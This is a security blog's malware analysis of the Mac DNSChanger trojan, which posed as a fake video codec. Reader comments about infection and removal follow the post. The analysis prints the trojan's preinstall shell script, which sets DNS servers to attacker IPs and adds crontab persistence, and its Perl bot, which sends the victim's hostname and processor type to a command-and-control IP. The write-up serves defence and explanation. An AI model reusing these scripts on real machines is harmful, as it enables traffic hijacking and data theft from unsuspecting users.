Home > Malwares > Analysis of OSX Trojan DNS Changer

Analysis of OSX Trojan DNS Changer

::::::::::::
File Size
::::::::::::

DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)


:::::::::::::::::
Propagation
:::::::::::::::::
This malicious code does not spread and propagate by itself. It uses an ancient yet effective Social Engineering technique to entice users to manually install the program. This trojan disguises as video codec and associates itself to a shared and free download videos. It was first seen and linked to porn sites but later it was also linked to funny videos and seen as splogs (spam blog).

Is this in-the-wild ? Yes.

::::::::::::::::::::::::::::::::::
Installation & Behaviour
::::::::::::::::::::::::::::::::::
A user visits a rogue site and download a fake video codec. Check the screenshot here.


The disk image file will be automatically mounted but not extracted. This means, the user has to manually install the downloaded file.


The downloaded installer – Install.pkg, contains the following files:



Info.plist is the first file invoked during the installation. This file contains detailed usage information and behavior such as:

Brief description: Microsoft Company
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart


Followed by Archive.bom, which contain information of files to install.

lsbom -s install.pkg/Contents/Archive.bom
.
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak
./Mozillaplug.plugin/Contents/version.plist
./QuickTime.xpt
./plugins.settings
./sendreq


It then access the files description.plist and PkgInfo, which gives the following information:

Version: 1.0
Description:
“Its a suppa puppa desc yo”
Title: MacCodec

PkgInfo: pmkrpkg1

Followed by BundleVersions.plist for version informations.

The installer comes with a “License Agreement”. Upon clicking “Continue”, a message box will display requiring the user to click “Agree” to continue the installation process.


Ok, let’s look further on the malicious codes.

Archive.pax.gz, postinstall, postupgrade, preinstall and preupgrade contains shell script that does the dirty works.


Postinstall and postupgrade contains exactly the same code, as well as preinstall and preupgrade.

Preinstall is invoked after the user agreed on the License Agreement. This trojan does not have damaging payloads, except it only modifies users’ DNS setting. Let’s check the code.

:::::::::::::::::::::::
Code Analysis
:::::::::::::::::::::::


Preinstall script:

#!/bin/bash
s1=85.255.115.22
s2=85.255.112.190
path=”/Library/Internet Plug-Ins”
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e ‘s/.*PrimaryService : //’)<


Using
Scutil, it retrieves user’s primary network interface.

open
get State:/Network/Global/IPv4
d.show
quit
EOF
)

It then modifies DNS name server IP to
s1=85.255.115.22 and s2=85.255.112.190.

/usr/sbin/scutil
open
d.init
d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS
quit

**Take note: IP addresses may change per variant.

It checks for a crontab file – plugins.settings, in this location “/Library/Internet Plug-Ins”. This file is a marker, it indicates whether this trojan has been previously installed or not.

exist=`crontab -l|grep plugins.settings`

If plugins.settings does not exist (meaning, it was not yet installed), the installation will proceed by dropping a temporary file \cron.inst

if [ "$exist" == "" ]; then
echo “* * * * * \”$path/plugins.settings\”>/dev/null 2>&1″ > cron.inst


Cron.inst has the following strings:

* * * * * “/Library/Internet Plug-Ins/QuickTime.xpt”>/dev/null 2>&1


It will execute cron.inst using Crontab command.

crontab cron.inst

Cron.inst executes another script, Quicktime.xpt. This is found in this location /Library/Internet Plug-Ins/

“/Library/Internet Plug-Ins/QuickTime.xpt”

In background, it will create a temporary file named, 1.

>/dev/null 2>&1

QuickTime.xpt redirects its output to this file instead of popping error or script command to the user’s screen.


Once cron.inst is executed, preinstall script will delete this temporary file.

rm -rf cron.inst
fi

QuickTime.xpt script:

This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its content to this location /Library/Internet Plug-Ins/.

Like preinstall script, QuickTime.xpt checks for users network information, attempt to modify DNS name server settings, checks the existence of QuickTime.xpt and if exist, it creates cron.inst, execute it and delete temporary file, 1.

Postinstall script:

#!/bin/sh
path=”/Library/Internet Plug-Ins/”
/usr/bin/perl “$path/sendreq”
rm -rf “$path/sendreq”

It executes sendreq, which is a perl script and deletes it.

SendReq Script:

This perl base bot acts as a backdoor client component and communicates to a remote server through socket.

#!/usr/bin/perl
use IO::Socket;

It uses MIME base64 encoding to transmit messages through HTTP.

use integer;
my $eol = $_[1];
$eol = “\n” unless defined $eol;

my $res = pack(“u”, $_[0]);
# Remove first character of each line, remove newlines
$res =~ s/^.//mg;
$res =~ s/\n//g;

$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 – length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/’=’ x $padding/e if $padding;
# break encoded string into lines of no more than 76 characters each
if (length $eol) {
$res =~ s/(.{1,76})/$1$eol/g;
}
return $res;
}


The bot command-and-control server:

my $server=”85.255.121.37″;

**Take note: IP addresses may change per variant.

Executes uname -p command to retrieve victim’s operating system processor type and hostname for the IP address.

my $server=”85.255.121.37″; my $cmd=’uname
my $cmd=’uname -p;echo “;”;hostname’;$cmd=~s/\n//g;


Encode the gathered information, indicating “mac”.

my $uniqid=encode_base64(“mac;”.$cmd); $uniqid=~s/\n//g;


Send a request to remote server.

my $request=”GET / HTTP/1.1\r\nAccept-Language: $unigid\r\nHost: $server\r\n\r\n”;


This bot sends a request to the remote server, attempting to establish a connection through TCP port 80.

my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>”tcp”,timeout=>10) or die();
print $socket $request;
close($socket);


Captured packet looks like this:


It sends victim’s information in base64 encoded strings:

GET / HTTP/1.1 Accept-Language: bWFjO2kzODY7cGMtdG9vbHNzLW1hY2Jvb2stcHJvLTE1LmxvY2Fsx Host: 85.255.121.37


Decoded version:

GET / HTTP/1.1 Accept-Language: mac;i386;xx-toolss-macbook-pro-15.local Host: 85.255.121.37

From this information, the C&C (command-and-control) server can determine the total count of infection, IP address and the geographical location of that infected host.

Furthermore, later versions of this trojan scripts are obfuscated making it little difficult for security analyst and researchers to read the code.


::::::::::::::
Conclusion
::::::::::::::::

Trojan DNSChanger is as simple as changing DNS settings – no complication and no destructive behavior. These are simple scripts that are widely available online, built into mac installer and deployed to several existing fake codec domains.

The lesson here is that malwares or threats in Mac does not have to be complicated. With the vast information available online, it is possible that an ordinary person without programming background – also called script kiddie, can cause interruption and damage to our daily lives.

  1. Anonymous Coward
    August 25, 2008 at 10:59 pm

    I fell for this trojan, too. I have ClamXav running on my Mac, and it didn’t catch it. When it installed, it added the DNS addresses you listed, but it faded them out, too. As a result, I couldn’t change or delete them. Following your analysis, I went to /Library/Internet Plug-Ins/ and removed plugins.settings, QuickTime.xpt, and Mozillaplug.plugin. (sendreq was nowhere to be found.) I then restarted my computer, and it restored the correct DNS addresses–because those are pulled from my home network’s router.

    I still have the original .dmg if you want it.

  2. mongo mcginty
    September 2, 2008 at 2:40 am

    I’ve recently spotted a variant that’s trying to talk to 64.28.188.220 and the C2 server.

  3. mongo mcginty
    September 2, 2008 at 2:41 am

    erh above should say “as the c2 server” (c2= command and control, fwiw)

  4. Frank
    September 22, 2008 at 11:40 am

    Was infected too. Bought a Mac because of all the crap I had on Windows machines…

  5. Methusela Cebrian Ferrer
    September 23, 2008 at 4:51 am

    Hi Frank, do you still have the URL where you downloaded the DMG ?

  6. mitch
    December 7, 2008 at 8:40 am

    I recently installed it by mistake or I think that I did. I looked in Library-internet plugins and couldn’t find quicktime.xpt or moxillaplug.plugin. I checked DNS and did not see s1=85.255.115.22 and s2=85.255.112.190 or 64.28.188.220. Did I dodge a bullet?? When I tried to install, it says installation failed. What should I look for? How do I know if it installed? How can I get rid of it if I have it?
    Thanks.

  7. Liane
    February 5, 2009 at 5:41 pm

    Just wondering…what can hackers do with your modified DNS settings? What do they really get out of it? In other words, what’s the real point to these trojans…

    • Methusela Cebrian Ferrer
      February 7, 2009 at 3:35 am

      I’m glad you made this question.

      This is what we call “DNS Pharming Attack”. So a malware like DNSChanger trojan attempts to modify users DNS settings so that when user type a valid URL they are redirected to a list of websites that belongs to these attackers. As an effect, an innocent/infected user will thought that he/she is clicking a valid website like example, Facebook.com instead its completely loading different page. Pharming provides an attacker a advantage to hijack your browser and may cause disclosure of your private information, browsing behavior, direct to exploit websites, push further malware, push advertisements (so, you’ll find pop-ups coming out from time to time).

      For common user perspective, this attack doesn’t seems harmful, however this is where attacker silently takes real advantage of the infection.

      I hope this provides you clear understanding of this threat.

  8. February 10, 2009 at 4:13 pm

    Got the DNS Changer but a different type. The IP is 85.255.113.126 and 85.255.112.227

    Used terminal and “sudo crontab -l” and found:

    * * * * * “/Library/Internet Plug-Ins/QuickTime.xpt”>/dev/null 2>&1

    However I can’t remove it. I only get “localized rsrc” is using it and therefore I can’t empty thrash.

    What to do?

    • Methusela Cebrian Ferrer
      February 11, 2009 at 10:20 am

      Hi Dr Alban, I hope my reply is not too late. To remove type “sudo crontab -r” – however, it would be better to do this without internet connection. Also, don’t forget to check your DNS settings and look for IP address starting with 85.xx.xx.xx and make sure you remove this entry.

      Let me know how it goes.

  9. trenton
    March 2, 2009 at 10:52 am

    i have the stupid wsearch.net thing and i looked for all the files that you say to remove and i tried to change the dns but its still there i dont know how to remove it i have a mac 10.4.11 and i have no clue how to make it stop i have tried all the things and it seems to be getting worse please help

    • Methusela Cebrian Ferrer
      March 3, 2009 at 8:01 am

      Hi Trenton, Wsearch.net is not related to any malware … you might want to check this: http://ithreats.net/2008/09/21/wsearchnetunknown-is-it-new-dnschanger/

      One of the reader’s comment …

      “This is problem with SMC wireless router/modems. I am an Interent Support Rep and have seen this problem with customer and described on other sites. The problem is that the default search domain on these routers is set to mygateway.net. Changing this to a legitimate search domain is a work around for the problem, but I have seen no explaination for why the default serch domain is set to this. It has been reported for more than one ISP so it not something that just one ISP is doing.”

  10. April 15, 2009 at 2:50 pm

    Not that I’m totally impressed, but this is a lot more than I expected for when I found a link on SU telling that the info is awesome. Thanks.

  11. Cleaner
    May 21, 2009 at 1:42 pm

    If someone still has the .dmg, could you please send it to me at antoinebis at gmail.com. I would like to test my program.

    Thanks !

  12. Eesha
    April 30, 2010 at 3:53 pm

    I have a mac and i rebooted the whole thing and there is currently nothing sitting in my internet plug ins folder and yet the virus is still there after i erased and re installed everything, pls help??

  1. August 21, 2008 at 11:34 pm
  2. August 30, 2008 at 2:21 pm

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: